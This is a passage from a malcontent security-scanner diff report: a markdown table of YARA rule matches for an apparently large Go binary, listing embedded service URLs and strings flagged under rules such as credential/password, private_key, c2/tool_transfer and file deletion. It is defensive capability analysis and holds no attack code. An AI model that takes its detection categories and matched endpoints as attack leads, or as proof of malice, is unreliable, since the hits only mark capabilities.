[https://api.stripe.com/v1/files](https://api.stripe.com/v1/files)
[https://app.paymoapp.com/api/me](https://app.paymoapp.com/api/me)
[https://capi.tokeet.com/v1/user](https://capi.tokeet.com/v1/user)
[https://fxmarketapi.com/apilive](https://fxmarketapi.com/apilive)
[https://gallery.azure.com/https](https://gallery.azure.com/https)
[https://graph.cloudapi.de/https](https://graph.cloudapi.de/https)
[https://httpbin.org/anythingAPI](https://httpbin.org/anythingAPI)
[https://open.larksuite.com/open](https://open.larksuite.com/open)
[https://upload.pypi.org/legacy/](https://upload.pypi.org/legacy/)
[http://chunkednosniffCreatedIM](http://chunkednosniffCreatedIM)
[http://www.opengis.net/gml/3.2](http://www.opengis.net/gml/3.2)
[http://www.opengis.net/kml/2.2](http://www.opengis.net/kml/2.2)
[http://www.wencodeURIComponent](http://www.wencodeURIComponent)
[https://api.abyssale.com/ready](https://api.abyssale.com/ready)
[https://api.datadoghq.comhttps](https://api.datadoghq.comhttps)
[https://api.eu.sendgrid.comtag](https://api.eu.sendgrid.comtag)
[https://api.fastforex.io/fetch](https://api.fastforex.io/fetch)
[https://api.flightapi.io/iata/](https://api.flightapi.io/iata/)
[https://api.ipinfodb.com/v3/ip](https://api.ipinfodb.com/v3/ip)
[https://api.mailjet.com/v4/sms](https://api.mailjet.com/v4/sms)
[https://api.mesibo.com/api.php](https://api.mesibo.com/api.php)
[https://api.pagar.me/1/balance](https://api.pagar.me/1/balance)
[https://api.scrapfly.io/scrape](https://api.scrapfly.io/scrape)
[https://api.stripe.com/v1/skus](https://api.stripe.com/v1/skus)
[https://api.userflow.com/users](https://api.userflow.com/users)
[https://apilayer.net/api/check](https://apilayer.net/api/check)
[https://authn.nvidia.com/token](https://authn.nvidia.com/token)
[https://coda.io/apis/v1/whoami](https://coda.io/apis/v1/whoami)
[https://cosmos.azure.comfailed](https://cosmos.azure.comfailed)
[https://timezoneapi.io/api/ip/](https://timezoneapi.io/api/ip/)
[https://v2.convertapi.com/user](https://v2.convertapi.com/user)
[https://www.appsynergy.com/api](https://www.appsynergy.com/api)
[http://www.w3.org/2002/07/owl](http://www.w3.org/2002/07/owl)
[http://www.w3.org/TR/2001/REC](http://www.w3.org/TR/2001/REC)
[https://api.apify.com/v2/acts](https://api.apify.com/v2/acts)
[https://api.cloverly.com/2019](https://api.cloverly.com/2019)
[https://api.github.comInclude](https://api.github.comInclude)
[https://api.logz.io/v2/whoami](https://api.logz.io/v2/whoami)
[https://api.nylas.com/account](https://api.nylas.com/account)
[https://api.vyte.in/v2/events](https://api.vyte.in/v2/events)
[https://google.comcrypto/ecdh](https://google.comcrypto/ecdh)
[https://graph.facebook.com/me](https://graph.facebook.com/me)
[https://vpnapi.io/api/8.8.8.8](https://vpnapi.io/api/8.8.8.8)
[http://Descriptionrelatively](http://Descriptionrelatively)
[https://api.documo.com/v1/me](https://api.documo.com/v1/me)
[https://api.etherscan.io/api](https://api.etherscan.io/api)
[https://api.jotform.com/user](https://api.jotform.com/user)
[https://api.linkpreview.net/](https://api.linkpreview.net/)
[https://api.openai.com/v1/me](https://api.openai.com/v1/me)
[https://api.roaring.io/token](https://api.roaring.io/token)
[https://api.telegram.org/bot](https://api.telegram.org/bot)
[https://api.webflow.com/info](https://api.webflow.com/info)
[https://github.com/google/go](https://github.com/google/go)
[https://github.com/llvm/llvm](https://github.com/llvm/llvm)
[https://huggingface.cofailed](https://huggingface.cofailed)
[https://sts.amazonaws.comnot](https://sts.amazonaws.comnot)
[https://www.planyo.com/rest/](https://www.planyo.com/rest/)
[http://www.w3.org/2005/Atom](http://www.w3.org/2005/Atom)
[https://api.bscscan.com/api](https://api.bscscan.com/api)
[https://api.edamam.com/auto](https://api.edamam.com/auto)
[https://api.figma.com/v1/me](https://api.figma.com/v1/me)
[https://api.geckoboard.com/](https://api.geckoboard.com/)
[https://api.github.com/2006](https://api.github.com/2006)
[https://api.heroku.com/apps](https://api.heroku.com/apps)
[https://api.ip2location.io/](https://api.ip2location.io/)
[https://api.qase.io/v1/user](https://api.qase.io/v1/user)
[https://api.twilio.com/2010](https://api.twilio.com/2010)
[https://api.typeform.com/me](https://api.typeform.com/me)
[https://api.zenrows.com/v1/](https://api.zenrows.com/v1/)
[https://cex.io/api/balance/](https://cex.io/api/balance/)
[https://deliver.kontent.ai/](https://deliver.kontent.ai/)
[https://geocode.xyz/51.4647](https://geocode.xyz/51.4647)
[https://gitlab.com/Skipping](https://gitlab.com/Skipping)
[https://jenkins.example.com](https://jenkins.example.com)
[https://neutrinoapi.net/url](https://neutrinoapi.net/url)
[https://registry.npmjs.org/](https://registry.npmjs.org/)
[http://169.254.170.2/redis](http://169.254.170.2/redis)
[http://www.w3.org/2000/svg](http://www.w3.org/2000/svg)
[http://www.w3.org/shortcut](http://www.w3.org/shortcut)
[https://api.podio.com/user](https://api.podio.com/user)
[https://api.scraperapi.com](https://api.scraperapi.com)
[https://api.tallyfy.com/me](https://api.tallyfy.com/me)
[https://payments.braintree](https://payments.braintree)
[https://sts.amazonaws.com/](https://sts.amazonaws.com/)
[http://localhost/truncate](http://localhost/truncate)
[http://ns.adobe.com/xfdf/](http://ns.adobe.com/xfdf/)
[http://www.interpretation](http://www.interpretation)
[https://api.deno.com/user](https://api.deno.com/user)
[https://api.monday.com/v2](https://api.monday.com/v2)
[https://api.shodan.io/api](https://api.shodan.io/api)
[https://collect2.com/api/](https://collect2.com/api/)
[https://github.com/dustin](https://github.com/dustin)
[http://mathematicsmargin](http://mathematicsmargin)
[https://ecs.aliyuncs.com](https://ecs.aliyuncs.com)
[https://iamcredentials..](https://iamcredentials..)
[https://pixabay.com/api/](https://pixabay.com/api/)
[https://push.databox.com](https://push.databox.com)
[http://applicationslink](http://applicationslink)
[https://google.comhttps](https://google.comhttps)
[https://v6.exchangerate](https://v6.exchangerate)
[http://html4/loose.dtd](http://html4/loose.dtd)
[http://staticsuggested](http://staticsuggested)
[https://api.adzuna.com](https://api.adzuna.com)
[https://api.kucoin.com](https://api.kucoin.com)
[https://api.sheety.co/](https://api.sheety.co/)
[https://api.whoxy.com/](https://api.whoxy.com/)
[https://apple.comhttps](https://apple.comhttps)
[https://dev.azure.com/](https://dev.azure.com/)
[https://gitlab.comScan](https://gitlab.comScan)
[https://www.bitmex.com](https://www.bitmex.com)
[http://iparticipation](http://iparticipation)
[https://dummysite.com](https://dummysite.com)
[https://staging.cloud](https://staging.cloud)
[http://www.language=](http://www.language=)
[https://commodities](https://commodities)
[https://foo.com/bar](https://foo.com/bar)
[https://scrutinizer](https://scrutinizer)
[http://interpreted](http://interpreted)
[http://www.hortcut](http://www.hortcut)
[https://api.travis](https://api.travis)
[https://app.travis](https://app.travis)
[https://www.recent](https://www.recent)
[http://google.com](http://google.com)
[http://interested](http://interested)
[http://navigation](http://navigation)
[http://www.C//DTD](http://www.C//DTD)
[http://www.style=](http://www.style=)
[https://technical](https://technical)
[https://www.World](https://www.World)
[http://according](http://according)
[http://encoding=](http://encoding=)
[http://imEnglish](http://imEnglish)
[http://site_name](http://site_name)
[http://www.years](http://www.years)
[https://api.meta](https://api.meta)
[https://file.io/](https://file.io/)
[https://ossrdbms](https://ossrdbms)
[https://www.easy](https://www.easy)
[http://familiar](http://familiar)
[http://www./div](http://www./div)
[http://www.icon](http://www.icon)
[http://www.text](http://www.text) | +| LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https://)
[http://](http://)
[x86_64](https://github.com/search?q=x86_64&type=code)
[AMD64](https://github.com/search?q=AMD64&type=code)
[amd64](https://github.com/search?q=amd64&type=code)
[arm64](https://github.com/search?q=arm64&type=code) | +| LOW | [collect/code/github_api](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/code/github_api.yara#github_api_user) | access GitHub API | [google/go-github](https://github.com/search?q=google%2Fgo-github&type=code)
[api.github.com](https://github.com/search?q=api.github.com&type=code) | +| LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [Attribute SyntaxPassword must be changed](https://github.com/search?q=Attribute+SyntaxPassword+must+be+changed&type=code)
[nil ValueWriterpassword must not be set](https://github.com/search?q=nil+ValueWriterpassword+must+not+be+set&type=code)
[no username and password are provided](https://github.com/search?q=no+username+and+password+are+provided&type=code)
[requires old password authentication](https://github.com/search?q=requires+old+password+authentication&type=code)
[GetVerifiablePasswordAuthentication](https://github.com/search?q=GetVerifiablePasswordAuthentication&type=code)
[meetsCouchbasePasswordRequirements](https://github.com/search?q=meetsCouchbasePasswordRequirements&type=code)
[meetsSnowflakePasswordRequirements](https://github.com/search?q=meetsSnowflakePasswordRequirements&type=code)
[the ChangePassword query execution](https://github.com/search?q=the+ChangePassword+query+execution&type=code)
[username or password was specified](https://github.com/search?q=username+or+password+was+specified&type=code)
[verifiable_password_authentication](https://github.com/search?q=verifiable_password_authentication&type=code)
[json into Changepassword request](https://github.com/search?q=json+into+Changepassword+request&type=code)
[key is not password protectedssh](https://github.com/search?q=key+is+not+password+protectedssh&type=code)
[NewControlBeheraPasswordPolicy](https://github.com/search?q=NewControlBeheraPasswordPolicy&type=code)
[ControlVChuPasswordMustChange](https://github.com/search?q=ControlVChuPasswordMustChange&type=code)
[native_passwordinvalid dbname](https://github.com/search?q=native_passwordinvalid+dbname&type=code)
[qunexpected password response](https://github.com/search?q=qunexpected+password+response&type=code)
[CertificatePasswordvprotobuf](https://github.com/search?q=CertificatePasswordvprotobuf&type=code)
[in list of old passwordsldap](https://github.com/search?q=in+list+of+old+passwordsldap&type=code)
[old_passwordsRepositories to](https://github.com/search?q=old_passwordsRepositories+to&type=code)
[incorrect passwordrardecode](https://github.com/search?q=incorrect+passwordrardecode&type=code)
[ControlVChuPasswordWarning](https://github.com/search?q=ControlVChuPasswordWarning&type=code)
[dPassword Policy - Behera](https://github.com/search?q=dPassword+Policy+-+Behera&type=code)
[PasswordCredentialsToken](https://github.com/search?q=PasswordCredentialsToken&type=code)
[secure_settings_password](https://github.com/search?q=secure_settings_password&type=code)
[AllowCleartextPasswords](https://github.com/search?q=AllowCleartextPasswords&type=code)
[allowCleartextPasswords](https://github.com/search?q=allowCleartextPasswords&type=code)
[change_passwordsecurity](https://github.com/search?q=change_passwordsecurity&type=code)
[Elasticsearch password](https://github.com/search?q=Elasticsearch+password&type=code)
[GetCertificatePassword](https://github.com/search?q=GetCertificatePassword&type=code)
[PasswordHashIterations](https://github.com/search?q=PasswordHashIterations&type=code)
[SecureSettingsPassword](https://github.com/search?q=SecureSettingsPassword&type=code)
[- pairs with password](https://github.com/search?q=-+pairs+with+password&type=code)
[ChangePasswordOptions](https://github.com/search?q=ChangePasswordOptions&type=code)
[NewChangePasswordFunc](https://github.com/search?q=NewChangePasswordFunc&type=code)
[NewReaderWithPassword](https://github.com/search?q=NewReaderWithPassword&type=code)
[PasswordAuthenticator](https://github.com/search?q=PasswordAuthenticator&type=code)
[SASLprepping password](https://github.com/search?q=SASLprepping+password&type=code)
[sendEncryptedPassword](https://github.com/search?q=sendEncryptedPassword&type=code)
[socksUsernamePassword](https://github.com/search?q=socksUsernamePassword&type=code)
[username AND password](https://github.com/search?q=username+AND+password&type=code)
[AllowNativePasswords](https://github.com/search?q=AllowNativePasswords&type=code)
[ChangePasswordLength](https://github.com/search?q=ChangePasswordLength&type=code)
[ChangePasswordOffset](https://github.com/search?q=ChangePasswordOffset&type=code)
[KeychainPasswordFunc](https://github.com/search?q=KeychainPasswordFunc&type=code)
[authRequiresPassword](https://github.com/search?q=authRequiresPassword&type=code)
[certificate_password](https://github.com/search?q=certificate_password&type=code)
[password_change_date](https://github.com/search?q=password_change_date&type=code)
[Pairs with password](https://github.com/search?q=Pairs+with+password&type=code)
[certificatePassword](https://github.com/search?q=certificatePassword&type=code)
[mongoPasswordDigest](https://github.com/search?q=mongoPasswordDigest&type=code)
[scrambleOldPassword](https://github.com/search?q=scrambleOldPassword&type=code)
[AllowEmptyPassword](https://github.com/search?q=AllowEmptyPassword&type=code)
[PasscodeInPassword](https://github.com/search?q=PasscodeInPassword&type=code)
[PasswordRegexCheck](https://github.com/search?q=PasswordRegexCheck&type=code)
[for ChangePassword](https://github.com/search?q=for+ChangePassword&type=code)
[passwordattachment](https://github.com/search?q=passwordattachment&type=code)
[AllowOldPasswords](https://github.com/search?q=AllowOldPasswords&type=code)
[PasswordEprotobuf](https://github.com/search?q=PasswordEprotobuf&type=code)
[allowOldPasswords](https://github.com/search?q=allowOldPasswords&type=code)
[parseUserPassword](https://github.com/search?q=parseUserPassword&type=code)
[winvalid password](https://github.com/search?q=winvalid+password&type=code)
[FilePasswordFunc](https://github.com/search?q=FilePasswordFunc&type=code)
[errEmptyPassword](https://github.com/search?q=errEmptyPassword&type=code)
[scramblePassword](https://github.com/search?q=scramblePassword&type=code)
[PasswordChanged](https://github.com/search?q=PasswordChanged&type=code)
[encryptPassword](https://github.com/search?q=encryptPassword&type=code)
[GetVCSPassword](https://github.com/search?q=GetVCSPassword&type=code)
[PasswordModify](https://github.com/search?q=PasswordModify&type=code)
[changepassword](https://github.com/search?q=changepassword&type=code)
[empty password](https://github.com/search?q=empty+password&type=code)
[manglePassword](https://github.com/search?q=manglePassword&type=code)
[password-store](https://github.com/search?q=password-store&type=code)
[Password from](https://github.com/search?q=Password+from&type=code)
[password_hash](https://github.com/search?q=password_hash&type=code)
[stripPassword](https://github.com/search?q=stripPassword&type=code)
[passwordFunc](https://github.com/search?q=passwordFunc&type=code)
[passworduser](https://github.com/search?q=passworduser&type=code)
[saltPassword](https://github.com/search?q=saltPassword&type=code)
[vcs_password](https://github.com/search?q=vcs_password&type=code)
[GetPassword](https://github.com/search?q=GetPassword&type=code)
[PasswordSet](https://github.com/search?q=PasswordSet&type=code)
[passwordSet](https://github.com/search?q=passwordSet&type=code)
[passwordf](https://github.com/search?q=passwordf&type=code) | +| LOW | [credential/ssl/private_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssl/private_key.yara#private_key_val) | References private keys | [private_key](https://github.com/search?q=private_key&type=code)
[privateKey](https://github.com/search?q=privateKey&type=code)
[privatekey](https://github.com/search?q=privatekey&type=code) | +| LOW | [crypto/aes](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes) | Supports AES (Advanced Encryption Standard) | [aes_256_cbc](https://github.com/search?q=aes_256_cbc&type=code)
[crypto/aes](https://github.com/search?q=crypto%2Faes&type=code)
[AES](https://github.com/search?q=AES&type=code) | +| LOW | [crypto/decrypt](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/decrypt.yara#decrypt) | decrypts data | [pter type in NewDecrypterPrivateKeyCoun](https://github.com/search?q=pter+type+in+NewDecrypterPrivateKeyCoun&type=code)
[lid options for Decryptcipher](https://github.com/search?q=lid+options+for+Decryptcipher&type=code)
[DecryptColumnEncryption](https://github.com/search?q=DecryptColumnEncryption&type=code)
[DecryptPKCS1v15SessionK](https://github.com/search?q=DecryptPKCS1v15SessionK&type=code)
[Decrypt_html_template_r](https://github.com/search?q=Decrypt_html_template_r&type=code)
[DecrypterInteract with](https://github.com/search?q=DecrypterInteract+with&type=code)
[PKCS1v15DecryptOptions](https://github.com/search?q=PKCS1v15DecryptOptions&type=code)
[newAesDecryptReader](https://github.com/search?q=newAesDecryptReader&type=code)
[DecryptPrivateKeys](https://github.com/search?q=DecryptPrivateKeys&type=code)
[rsaDecrypterSigner](https://github.com/search?q=rsaDecrypterSigner&type=code)
[vDecrypting column](https://github.com/search?q=vDecrypting+column&type=code)
[ecDecrypterSigner](https://github.com/search?q=ecDecrypterSigner&type=code)
[edDecrypterSigner](https://github.com/search?q=edDecrypterSigner&type=code)
[NewOCFBDecrypter](https://github.com/search?q=NewOCFBDecrypter&type=code)
[DecryptExplicit](https://github.com/search?q=DecryptExplicit&type=code)
[DecryptPEMBlock](https://github.com/search?q=DecryptPEMBlock&type=code)
[GetDecryptedKey](https://github.com/search?q=GetDecryptedKey&type=code)
[NewCBCDecrypter](https://github.com/search?q=NewCBCDecrypter&type=code)
[NewCFBDecrypter](https://github.com/search?q=NewCFBDecrypter&type=code)
[NewECBDecrypter](https://github.com/search?q=NewECBDecrypter&type=code)
[DecryptionKeys](https://github.com/search?q=DecryptionKeys&type=code)
[DecryptTicket](https://github.com/search?q=DecryptTicket&type=code)
[DecrypterOpts](https://github.com/search?q=DecrypterOpts&type=code)
[aeadDecrypter](https://github.com/search?q=aeadDecrypter&type=code)
[decbDecrypter](https://github.com/search?q=decbDecrypter&type=code)
[ocfbDecrypter](https://github.com/search?q=ocfbDecrypter&type=code)
[wecbDecrypter](https://github.com/search?q=wecbDecrypter&type=code)
[cbcDecrypter](https://github.com/search?q=cbcDecrypter&type=code)
[newDecrypter](https://github.com/search?q=newDecrypter&type=code)
[rsaDecryptOk](https://github.com/search?q=rsaDecryptOk&type=code)
[DecryptArgs](https://github.com/search?q=DecryptArgs&type=code)
[DecryptOAEP](https://github.com/search?q=DecryptOAEP&type=code)
[pkeDecrypt](https://github.com/search?q=pkeDecrypt&type=code) | | LOW | [crypto/ecdsa](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/ecdsa.yara#crypto_ecdsa) | Uses the Go crypto/ecdsa library | [crypto/ecdsa](https://github.com/search?q=crypto%2Fecdsa&type=code) | | LOW | [crypto/ed25519](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/ed25519.yara#ed25519) | Elliptic curve algorithm used by TLS and SSH | [ed25519](https://github.com/search?q=ed25519&type=code) | -| LOW | [crypto/public_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/public_key.yara#public_key) | references a 'public key' | [Public key](https://github.com/search?q=Public+key&type=code)
[PublicKey](https://github.com/search?q=PublicKey&type=code)
[public key](https://github.com/search?q=public+key&type=code)
[public-key](https://github.com/search?q=public-key&type=code)
[publicKey](https://github.com/search?q=publicKey&type=code)
[public_key](https://github.com/search?q=public_key&type=code)
[publickey](https://github.com/search?q=publickey&type=code) | -| LOW | [crypto/tls](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/tls.yara#tls) | tls | [TLS13](https://github.com/search?q=TLS13&type=code)
[TLSVersion](https://github.com/search?q=TLSVersion&type=code)
[crypto/tls](https://github.com/search?q=crypto%2Ftls&type=code) | +| LOW | [crypto/public_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/public_key.yara#public_key) | references a 'public key' | [Public key](https://github.com/search?q=Public+key&type=code)
[public key](https://github.com/search?q=public+key&type=code)
[public-key](https://github.com/search?q=public-key&type=code)
[public_key](https://github.com/search?q=public_key&type=code)
[PublicKey](https://github.com/search?q=PublicKey&type=code)
[publicKey](https://github.com/search?q=publicKey&type=code)
[publickey](https://github.com/search?q=publickey&type=code) | +| LOW | [crypto/tls](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/tls.yara#tls) | tls | [TLSVersion](https://github.com/search?q=TLSVersion&type=code)
[crypto/tls](https://github.com/search?q=crypto%2Ftls&type=code)
[TLS13](https://github.com/search?q=TLS13&type=code) | | LOW | [data/compression/bzip2](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/bzip2.yara#bzip2) | Works with bzip2 files | [bzip2](https://github.com/search?q=bzip2&type=code) | | LOW | [data/compression/gzip](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/gzip.yara#gzip) | [works with gzip files](https://www.gnu.org/software/gzip/) | [gzip](https://github.com/search?q=gzip&type=code) | | LOW | [data/compression/lzma](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/lzma.yara#lzma) | [works with lzma files](https://en.wikipedia.org/wiki/Lempel%E2%80%93Ziv%E2%80%93Markov_chain_algorithm) | [lzma](https://github.com/search?q=lzma&type=code) | | LOW | [data/compression/zlib](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/zlib.yara#zlib) | uses zlib | [zlib](https://github.com/search?q=zlib&type=code) | -| LOW | [data/compression/zstd](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/zstd.yara#zstd) | Zstandard: fast real-time compression algorithm | [(/](https://github.com/search?q=%28%B5%2F%FD&type=code)
[ZSTD_decompressStream](https://github.com/search?q=ZSTD_decompressStream&type=code)
[zstd](https://github.com/search?q=zstd&type=code) | +| LOW | [data/compression/zstd](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/zstd.yara#zstd) | Zstandard: fast real-time compression algorithm | [ZSTD_decompressStream](https://github.com/search?q=ZSTD_decompressStream&type=code)
[zstd](https://github.com/search?q=zstd&type=code) | | LOW | [data/embedded/pem_certificate](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-pem-certificate.yara#begin_cert) | Contains embedded PEM certificate | [--BEGIN CERTIFICATE--](https://github.com/search?q=--BEGIN+CERTIFICATE--&type=code) | | LOW | [data/encoding/base64](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/base64.yara#b64) | Supports base64 encoded strings | [base64](https://github.com/search?q=base64&type=code) | | LOW | [data/encoding/json](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/json.yara#encoding_json) | Supports JSON encoded objects | [encoding/json](https://github.com/search?q=encoding%2Fjson&type=code) | -| LOW | [data/encoding/json_decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/json-decode.yara#jsondecode) | Decodes JSON messages | [JSONDecode](https://github.com/search?q=JSONDecode&type=code)
[json.Unmarshal](https://github.com/search?q=json.Unmarshal&type=code) | +| LOW | [data/encoding/json_decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/json-decode.yara#jsondecode) | Decodes JSON messages | [json.Unmarshal](https://github.com/search?q=json.Unmarshal&type=code)
[JSONDecode](https://github.com/search?q=JSONDecode&type=code) | | LOW | [data/encoding/json_encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/json-encode.yara#JSONEncode) | encodes JSON | [JSONEncode](https://github.com/search?q=JSONEncode&type=code) | | LOW | [data/hash/blake2b](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/blake2b.yara#crypto_blake2b) | Uses blake2b encryption algorithm | [blake2b](https://github.com/search?q=blake2b&type=code) | | LOW | [data/hash/md5](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/md5.yara#MD5) | Uses the MD5 signature format | [md5:copy](https://github.com/search?q=md5%3Acopy&type=code) | @@ -122,10 +122,10 @@ | LOW | [discover/system/cpu](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/cpu.yara#processor_count) | [gets number of processors](https://man7.org/linux/man-pages/man3/get_nprocs.3.html) | [nproc](https://github.com/search?q=nproc&type=code) | | LOW | [discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [/proc/sys/kernel/hostname](https://github.com/search?q=%2Fproc%2Fsys%2Fkernel%2Fhostname&type=code) | | LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [syscall.Uname](https://github.com/search?q=syscall.Uname&type=code)
[uname](https://github.com/search?q=uname&type=code) | -| LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | -| LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [ENV](https://github.com/search?q=ENV&type=code)
[USER](https://github.com/search?q=USER&type=code)
[environ](https://github.com/search?q=environ&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | -| LOW | [exec/conditional/LANG](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/conditional/LANG.yara#LANG_getenv) | Looks up language of current user | [LANG](https://github.com/search?q=LANG&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | -| LOW | [exec/plugin](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/plugin/plugin.yara#plugin) | references a 'plugin' | [EditorImportPlugin](https://github.com/search?q=EditorImportPlugin&type=code)
[EditorPlugin](https://github.com/search?q=EditorPlugin&type=code)
[ExtendedPlugins](https://github.com/search?q=ExtendedPlugins&type=code)
[NewPluginsFunc](https://github.com/search?q=NewPluginsFunc&type=code)
[PluginStats](https://github.com/search?q=PluginStats&type=code)
[PluginsFormat](https://github.com/search?q=PluginsFormat&type=code)
[PluginsRecord](https://github.com/search?q=PluginsRecord&type=code)
[PluginsStatus](https://github.com/search?q=PluginsStatus&type=code)
[SetPluginConfig](https://github.com/search?q=SetPluginConfig&type=code)
[extended_plugins](https://github.com/search?q=extended_plugins&type=code)
[hungarian_ciunknown auth plugin](https://github.com/search?q=hungarian_ciunknown+auth+plugin&type=code)
[not use requested auth plugin](https://github.com/search?q=not+use+requested+auth+plugin&type=code)
[of theremnants ofpluginspage](https://github.com/search?q=of+theremnants+ofpluginspage&type=code)
[plugin loaded](https://github.com/search?q=plugin+loaded&type=code)
[pluginVersion](https://github.com/search?q=pluginVersion&type=code)
[pluginclose](https://github.com/search?q=pluginclose&type=code)
[pluginopen](https://github.com/search?q=pluginopen&type=code)
[pluginpath](https://github.com/search?q=pluginpath&type=code)
[pluginsFormat](https://github.com/search?q=pluginsFormat&type=code)
[pluginsrecord](https://github.com/search?q=pluginsrecord&type=code)
[pluginstats](https://github.com/search?q=pluginstats&type=code)
[pluginswithin](https://github.com/search?q=pluginswithin&type=code)
[relativebringingincreasegovernorplugins](https://github.com/search?q=relativebringingincreasegovernorplugins&type=code) | +| LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [getenv](https://github.com/search?q=getenv&type=code)
[HOME](https://github.com/search?q=HOME&type=code) | +| LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [environ](https://github.com/search?q=environ&type=code)
[getenv](https://github.com/search?q=getenv&type=code)
[USER](https://github.com/search?q=USER&type=code)
[ENV](https://github.com/search?q=ENV&type=code) | +| LOW | [exec/conditional/LANG](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/conditional/LANG.yara#LANG_getenv) | Looks up language of current user | [getenv](https://github.com/search?q=getenv&type=code)
[LANG](https://github.com/search?q=LANG&type=code) | +| LOW | [exec/plugin](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/plugin/plugin.yara#plugin) | references a 'plugin' | [relativebringingincreasegovernorplugins](https://github.com/search?q=relativebringingincreasegovernorplugins&type=code)
[hungarian_ciunknown auth plugin](https://github.com/search?q=hungarian_ciunknown+auth+plugin&type=code)
[not use requested auth plugin](https://github.com/search?q=not+use+requested+auth+plugin&type=code)
[of theremnants ofpluginspage](https://github.com/search?q=of+theremnants+ofpluginspage&type=code)
[EditorImportPlugin](https://github.com/search?q=EditorImportPlugin&type=code)
[extended_plugins](https://github.com/search?q=extended_plugins&type=code)
[ExtendedPlugins](https://github.com/search?q=ExtendedPlugins&type=code)
[SetPluginConfig](https://github.com/search?q=SetPluginConfig&type=code)
[NewPluginsFunc](https://github.com/search?q=NewPluginsFunc&type=code)
[PluginsFormat](https://github.com/search?q=PluginsFormat&type=code)
[PluginsRecord](https://github.com/search?q=PluginsRecord&type=code)
[PluginsStatus](https://github.com/search?q=PluginsStatus&type=code)
[plugin loaded](https://github.com/search?q=plugin+loaded&type=code)
[pluginVersion](https://github.com/search?q=pluginVersion&type=code)
[pluginsFormat](https://github.com/search?q=pluginsFormat&type=code)
[pluginsrecord](https://github.com/search?q=pluginsrecord&type=code)
[pluginswithin](https://github.com/search?q=pluginswithin&type=code)
[EditorPlugin](https://github.com/search?q=EditorPlugin&type=code)
[PluginStats](https://github.com/search?q=PluginStats&type=code)
[pluginclose](https://github.com/search?q=pluginclose&type=code)
[pluginstats](https://github.com/search?q=pluginstats&type=code)
[pluginopen](https://github.com/search?q=pluginopen&type=code)
[pluginpath](https://github.com/search?q=pluginpath&type=code) | | LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) | | LOW | [exec/shell/SHELL](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/SHELL.yara#SHELL) | [path to active shell](https://man.openbsd.org/login.1#ENVIRONMENT) | [SHELL](https://github.com/search?q=SHELL&type=code) | | LOW | [exec/system_controls/systemd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/system_controls/systemd.yara#ref_systemd) | makes references to systemd | [SYSTEMD](https://github.com/search?q=SYSTEMD&type=code)
[systemd](https://github.com/search?q=systemd&type=code) | @@ -135,31 +135,31 @@ | LOW | [fs/fifo_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/fifo-create.yara#mkfifo) | make a FIFO special file (a named pipe) | [mkfifo](https://github.com/search?q=mkfifo&type=code) | | LOW | [fs/file/delete_forcibly](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete-forcibly.yara#rm_force) | Forcibly deletes files | [rm non-TreeNoderserror creating cancelr](https://github.com/search?q=rm+non-TreeNoderserror+creating+cancelr&type=code)
